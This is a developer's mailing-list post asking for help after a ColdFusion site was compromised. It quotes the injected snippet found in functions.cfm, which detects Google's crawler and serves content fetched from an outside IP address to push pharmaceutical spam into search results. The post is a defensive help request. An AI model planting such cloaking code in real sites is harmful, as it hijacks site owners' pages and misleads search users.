Recently a site of ours got hacked - basically, a Google search the site 
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:

<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( 
"google", REQUEST.UserAgent )) >
<cfhttp method="get" 
url="http://168.16.228.250/fms/";><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>

I'm not the server admin for this site, so they're sorta pointing the 
finger at us developers, and we're pointing fingers back at them about 
lax server security. We've got a boatload of stuff on this site to 
prevernt SQL injection, including Justin D. Scott's application script, 
carefully checking anything to goes into the database, client and server 
side form validation, blah, blah, blah...

Anybody seen the above, and if so, thoughts? Anybody manage to determine 
how the exploit happened to start with?


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:353143
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm

Reply via email to